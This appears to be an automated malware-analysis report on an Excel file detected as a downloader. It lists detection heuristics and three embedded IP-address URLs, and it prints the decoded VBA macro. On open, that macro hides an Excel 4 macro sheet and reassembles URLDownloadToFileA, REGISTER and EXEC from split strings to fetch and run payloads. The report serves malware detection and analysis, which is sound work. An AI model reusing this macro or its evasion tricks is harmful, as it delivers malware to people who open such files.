MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
The file is an Excel document containing VBA macros, including an Auto_Open subroutine. Critical heuristics indicate obfuscated API calls to 'URLDownloadToFile', suggesting the macro's purpose is to download a payload. The embedded URLs are likely sources for this payload. The ClamAV detection name 'Doc.Downloader' further supports this assessment.
Heuristics 6
-
ClamAV: Doc.Downloader.Docusign112100-9908075-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Docusign112100-9908075-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://5.196.247.6/� In document text (OLE body)
- http://94.140.112.149/In document text (OLE body)
- http://84.246.85.196//In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3568 bytes |
SHA-256: 57dbf314ba8d8e0cd5ae01430a1b3452bf5356fd0c3f739414504ecdf5e48acc |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Public Sub applyLogosToDashboard()
End Sub
Private Sub asWorkbook_Activateas()
End Sub
Private Sub saWorkbook_Opensa()
On Error Resume Next
End Sub
Private Sub ssaaInitWorkbookssaa()
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{D019F920-D807-4C28-8E76-E08AEEA9D280}{8B26FE1D-F797-4308-AC6E-5B76F083A7BE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Module5"
Sub auto_open()
Retio
Application.Run Sheets("Niola").Range("H1")
End Sub
Function dfgdf()
Sheets("Niola").Range("H24") = UserForm2.Label1.Caption
Sheets("Niola").Range("H25") = UserForm2.Label3.Caption
Sheets("Niola").Range("H26") = UserForm2.Label4.Caption
End Function
Attribute VB_Name = "Module1"
Function jgfjgjfhfhf()
Application.ScreenUpdating = False
Excel4IntlMacroSheets.Add.Name = "Niola"
Sheets("Niola").Visible = False
Nyrtyfh
dfgdf
End Function
Sub auto_close()
Pola
End Sub
Function Nyrtyfh()
Sheets("Niola").Range("A1:M100").Font.Color = vbWhite
End Function
Function hkjhjk()
Sheets("Niola").Range("G10") = UserForm2.Label5.Caption
Sheets("Niola").Range("G11") = UserForm2.Label5.Caption & "1"
Sheets("Niola").Range("G12") = UserForm2.Label5.Caption & "2"
End Function
Function Fdjgj()
Sheets("Niola").Range("H10") = "=Byukilos(0,H24&K17&K18,G10,0,0)"
Sheets("Niola").Range("H11") = "=Byukilos(0,H25&K17&K18,G11,0,0)"
Sheets("Niola").Range("H12") = "=Byukilos(0,H26&K17&K18,G12,0,0)"
End Function
Function Pola()
Application.ScreenUpdating = True
Application.DisplayAlerts = False
Sheets("Niola").Delete
Application.DisplayAlerts = True
End Function
Attribute VB_Name = "Module2"
Function Retio()
On Error Resume Next
net = "uRl"
net1 = "Mon"
Bytruy = "R" & "E" & "G" & "I" & "STER"
Neyrey = "="
JRyf = "" & "E" & "" & "X" & "" & "E" & "" & "C"
Loiu = UserForm2.Blost.Caption
jgfjgjfhfhf
Sheets("Niola").Range("K17") = "=N" & "O" & "W()"
Sheets("Niola").Range("K18") = ".d" & "a" & "t"
Sheets("Niola").Range("H35") = "=" & "H" & "ALT()"
Sheets("Niola").Range("I9") = net & net1
Sheets("Niola").Range("I10") = "U" & "RL" & "Do" & "wn" & "lo" & "ad" & "To" & "Fi" & "le" & "A"
Sheets("Niola").Range("I11") = "J" & "J" & "C" & "C" & "B" & "B"
Sheets("Niola").Range("I12") = "Byukilos"
hkjhjk
Sheets("Niola").Range("I17") = Loiu
Sheets("Niola").Range("I18") = Loiu & "1"
Sheets("Niola").Range("I19") = Loiu & "2"
Fdjgj
Sheets("Niola").Range("H9") = Neyrey & Bytruy & "(I9,I10&J10,I11,I12,,1,9)"
Sheets("Niola").Range("H17") = Neyrey & JRyf & "(I17)"
Sheets("Niola").Range("H18") = Neyrey & JRyf & "(I18)"
Sheets("Niola").Range("H19") = Neyrey & JRyf & "(I19)"
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.